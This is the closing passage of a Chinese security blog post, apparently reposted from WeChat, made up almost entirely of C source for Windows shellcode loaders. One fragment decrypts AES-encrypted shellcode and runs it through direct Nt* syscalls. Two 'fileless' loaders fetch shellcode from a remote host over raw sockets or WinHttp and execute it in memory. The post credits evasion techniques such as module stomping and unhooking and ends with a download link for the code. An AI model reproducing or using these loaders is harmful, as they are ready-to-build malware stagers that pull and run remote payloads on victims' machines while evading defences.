0xf1, 0xd7, 0x28, 0x1d, 0x3b, 0xcd, 0x2, 0x7, 0xc, 0x72, 0x37, 0x94, 0xa6, 0x1b, 0x5c, 0x6d, 0x41 };

DWORD payload_length = sizeof(AESshellcode); PVOID BaseAddress = NULL; SIZE_T dwSize = 0x2000; NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!NT_SUCCESS(status1)) { return 1; } // Decrypt the AES payload to Original Shellcode DecryptAES((char*)AESshellcode, payload_length, AESkey, sizeof(AESkey)); RtlMoveMemory(BaseAddress, AESshellcode, sizeof(AESshellcode)); HANDLE hThread; DWORD OldProtect = 0; NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect); if (!NT_SUCCESS(NtProtectStatus1)) { return 2; } HANDLE hHostThread = INVALID_HANDLE_VALUE;NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL); if (!NT_SUCCESS(NtCreateThreadstatus)) { printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError()); return 3; } LARGE_INTEGER Timeout; Timeout.QuadPart = -10000000; NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout); if (!NT_SUCCESS(NTWFSOstatus)) { printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError()); return 4; } return 0;}

4、FileLess shellcode:

4-1、Using Sockets:

// credits : @SEKTOR7Module stomping, Module Unhooking, No New Thread, Function obfuscation#include <winsock2.h>#include <ws2tcpip.h>#include <Windows.h>#include <stdio.h>#pragma comment(lib, "ntdll")#pragma comment (lib, "Ws2_32.lib")#pragma comment (lib, "Mswsock.lib")#pragma comment (lib, "AdvApi32.lib")#define NtCurrentProcess()   ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endif

EXTERN_C NTSTATUS NtAllocateVirtualMemory( HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

EXTERN_C NTSTATUS NtProtectVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN OUT PSIZE_T RegionSize, IN ULONG NewProtect, OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN PVOID ObjectAttributes, IN HANDLE ProcessHandle, IN PVOID lpStartAddress, IN PVOID lpParameter, IN ULONG Flags, IN SIZE_T StackZeroBits, IN SIZE_T SizeOfStackCommit, IN SIZE_T SizeOfStackReserve, OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject( IN HANDLE Handle, IN BOOLEAN Alertable, IN PLARGE_INTEGER Timeout);void RunShellcode(char* shellcode, DWORD shellcodeLen) { PVOID BaseAddress = NULL; SIZE_T dwSize = 0x2000; PCSTR Terminator = NULL; NTSTATUS STATUS; NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!NT_SUCCESS(status1)) { return ; } RtlMoveMemory(BaseAddress, shellcode, shellcodeLen); HANDLE hThread; DWORD OldProtect = 0; NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, (PSIZE_T)&dwSize, PAGE_EXECUTE_READ, &OldProtect); if (!NT_SUCCESS(NtProtectStatus1)) { return ; } HANDLE hHostThread = INVALID_HANDLE_VALUE; NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL); if (!NT_SUCCESS(NtCreateThreadstatus)) { printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError()); return ; } LARGE_INTEGER Timeout; Timeout.QuadPart = -10000000; NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout); if (!NT_SUCCESS(NTWFSOstatus)) { printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError()); return ; }}void getShellcode_Run(char* host, char* port, char* resource) { DWORD oldp = 0; BOOL returnValue; size_t origsize = strlen(host) + 1; const size_t newsize = 100; size_t convertedChars = 0; wchar_t Whost[newsize]; mbstowcs_s(&convertedChars, Whost, origsize, host, _TRUNCATE); WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; struct addrinfo* result = NULL, * ptr = NULL, hints; char sendbuf[MAX_PATH] = ""; lstrcatA(sendbuf, "GET /"); lstrcatA(sendbuf, resource); char recvbuf[DEFAULT_BUFLEN]; memset(recvbuf, 0, DEFAULT_BUFLEN); int iResult; int recvbuflen = DEFAULT_BUFLEN; // Initialize Winsock iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); if (iResult != 0) { printf("WSAStartup failed with error: %d\n", iResult); return ; } ZeroMemory(&hints, sizeof(hints)); hints.ai_family = PF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; // Resolve the server address and port iResult = getaddrinfo(host, port, &hints, &result); if (iResult != 0) { printf("getaddrinfo failed with error: %d\n", iResult); WSACleanup(); return ; } // Attempt to connect to an address until one succeeds for (ptr = result; ptr != NULL; ptr = ptr->ai_next) {

// Create a SOCKET for connecting to server ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol); if (ConnectSocket == INVALID_SOCKET) { printf("socket failed with error: %ld\n", WSAGetLastError()); WSACleanup(); return ; } // Connect to server. printf("[+] Connect to %s:%s", host, port); iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); if (iResult == SOCKET_ERROR) { closesocket(ConnectSocket); ConnectSocket = INVALID_SOCKET; continue; } break; } freeaddrinfo(result); if (ConnectSocket == INVALID_SOCKET) { printf("Unable to connect to server!\n"); WSACleanup(); return ; } // Send an initial buffer iResult = send(ConnectSocket, sendbuf, (int)strlen(sendbuf), 0); if (iResult == SOCKET_ERROR) { printf("send failed with error: %d\n", WSAGetLastError()); closesocket(ConnectSocket); WSACleanup(); return ; } printf("\n[+] Sent %ld Bytes\n", iResult); // shutdown the connection since no more data will be sent iResult = shutdown(ConnectSocket, SD_SEND); if (iResult == SOCKET_ERROR) { printf("shutdown failed with error: %d\n", WSAGetLastError()); closesocket(ConnectSocket); WSACleanup(); return ; } // Receive until the peer closes the connection do { iResult = recv(ConnectSocket, (char*)recvbuf, recvbuflen, 0); if (iResult > 0) printf("[+] Received %d Bytes\n", iResult); else if (iResult == 0) printf("[+] Connection closed\n"); else printf("recv failed with error: %d\n", WSAGetLastError()); RunShellcode(recvbuf, recvbuflen); } while (iResult > 0); // cleanup closesocket(ConnectSocket); WSACleanup();}int main(int argc, char** argv) { // Validate the parameters if (argc != 4) { printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>\n", argv[0]); return 1; } getShellcode_Run(argv[1], argv[2], argv[3]); return 0;}

4-2、Using WinHttp:

#include <Windows.h>#include <stdio.h>#include <wininet.h>#include <winhttp.h>#include <vector>#pragma comment(lib, "ntdll")#pragma comment(lib, "winhttp")#pragma warning (disable: 4996)#define _CRT_SECURE_NO_WARNINGS#define NtCurrentProcess()   ((HANDLE)-1)#define DEFAULT_BUFLEN 4096#ifndef NT_SUCCESS#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)#endifEXTERN_C NTSTATUS NtAllocateVirtualMemory(    HANDLE    ProcessHandle,    PVOID* BaseAddress,    ULONG_PTR ZeroBits,    PSIZE_T   RegionSize,    ULONG     AllocationType,    ULONG     Protect);EXTERN_C NTSTATUS NtProtectVirtualMemory(    IN HANDLE ProcessHandle,    IN OUT PVOID* BaseAddress,    IN OUT PSIZE_T RegionSize,    IN ULONG NewProtect,    OUT PULONG OldProtect);

EXTERN_C NTSTATUS NtCreateThreadEx( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN PVOID ObjectAttributes, IN HANDLE ProcessHandle, IN PVOID lpStartAddress, IN PVOID lpParameter, IN ULONG Flags, IN SIZE_T StackZeroBits, IN SIZE_T SizeOfStackCommit, IN SIZE_T SizeOfStackReserve, OUT PVOID lpBytesBuffer);EXTERN_C NTSTATUS NtWaitForSingleObject( IN HANDLE Handle, IN BOOLEAN Alertable, IN PLARGE_INTEGER Timeout);void RunShellcode(char* shellcode, DWORD shellcodeLen) { PVOID BaseAddress = NULL; SIZE_T dwSize2 = 0x2000; PCSTR Terminator = NULL; NTSTATUS STATUS;

NTSTATUS status1 = NtAllocateVirtualMemory(NtCurrentProcess(), &BaseAddress, 0, &dwSize2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!NT_SUCCESS(status1)) { return ; } RtlMoveMemory(BaseAddress, shellcode, shellcodeLen); HANDLE hThread; DWORD OldProtect = 0; NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(NtCurrentProcess(), &BaseAddress, &dwSize2, PAGE_EXECUTE_READ, &OldProtect); if (!NT_SUCCESS(NtProtectStatus1)) { return; } printf("\n\nShellcode_mem : %p\n\n", BaseAddress); getchar(); HANDLE hHostThread = INVALID_HANDLE_VALUE; NTSTATUS NtCreateThreadstatus = NtCreateThreadEx(&hHostThread, 0x1FFFFF, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)BaseAddress, NULL, FALSE, NULL, NULL, NULL, NULL); if (!NT_SUCCESS(NtCreateThreadstatus)) { printf("[!] Failed in sysNtCreateThreadEx (%u)\n", GetLastError()); return; } LARGE_INTEGER Timeout; Timeout.QuadPart = -10000000; NTSTATUS NTWFSOstatus = NtWaitForSingleObject(hHostThread, FALSE, &Timeout); if (!NT_SUCCESS(NTWFSOstatus)) { printf("[!] Failed in sysNtWaitForSingleObject (%u)\n", GetLastError()); return; }}void getShellcode_Run(wchar_t* whost, DWORD port, wchar_t* wresource) { DWORD dwSize = 0; DWORD dwDownloaded = 0; LPSTR pszOutBuffer = NULL; BOOL bResults = FALSE; HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL; // Use WinHttpOpen to obtain a session handle. hSession = WinHttpOpen(L"WinHTTP Example/1.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); // Specify an HTTP server. if (hSession) hConnect = WinHttpConnect(hSession, whost, port, 0); else printf("Failed in WinHttpConnect (%u)\n", GetLastError()); // Create an HTTP request handle. if (hConnect) hRequest = WinHttpOpenRequest(hConnect, L"GET", wresource, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, NULL); else printf("Failed in WinHttpOpenRequest (%u)\n", GetLastError()); // Send a request. if (hRequest) bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0); else printf("Failed in WinHttpSendRequest (%u)\n", GetLastError()); // End the request. if (bResults) bResults = WinHttpReceiveResponse(hRequest, NULL); else printf("Failed in WinHttpReceiveResponse (%u)\n", GetLastError()); // Keep checking for data until there is nothing left. if (bResults) do { // Check for available data. dwSize = 0; if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) printf("Error %u in WinHttpQueryDataAvailable (%u)\n", GetLastError()); // Allocate space for the buffer. pszOutBuffer = new char[dwSize + 1]; if (!pszOutBuffer) { printf("Out of memory\n"); dwSize = 0; } else { // Read the Data. ZeroMemory(pszOutBuffer, dwSize + 1); if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) printf("Error %u in WinHttpReadData.\n", GetLastError()); else { // Run the shellcode RunShellcode(pszOutBuffer, dwSize + 1); } } } while (dwSize > 0); // Report any errors. if (!bResults) printf("Error %d has occurred.\n", GetLastError());

// Close any open handles. if (hRequest) WinHttpCloseHandle(hRequest); if (hConnect) WinHttpCloseHandle(hConnect); if (hSession) WinHttpCloseHandle(hSession);}int main(int argc, char** argv) { // Validate the parameters if (argc != 4) { printf("[+] Usage: %s <RemoteIP> <RemotePort> <Resource>\n", argv[0]); return 1; } char* host = argv[1]; DWORD port = atoi(argv[2]); char* resource = argv[3]; const size_t cSize1 = strlen(host) + 1; wchar_t* whost = new wchar_t[cSize1]; mbstowcs(whost, host, cSize1); const size_t cSize2 = strlen(resource) + 1; wchar_t* wresource = new wchar_t[cSize2]; mbstowcs(wresource, resource, cSize2); getShellcode_Run(whost, port, wresource); return 0;}

下址地址:

链接:https://pan.baidu.com/s/1aQkt93RPdFVR3wj0V13d4w 提取码:9g8j 

题外话:用 VS2022-V17.5编译,果然如网上介绍的那样,超快,满意!

文章来源:MicroPest


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247496959&idx=1&sn=2b4b5cc884981d69f0a5e400a608739f&chksm=ea340ba5dd4382b3f84fdad2d327d25b46f00efe9b9627b3ecd4901712b42fdc80f6ec780dd8#rd
如有侵权请联系:admin#unsafe.sh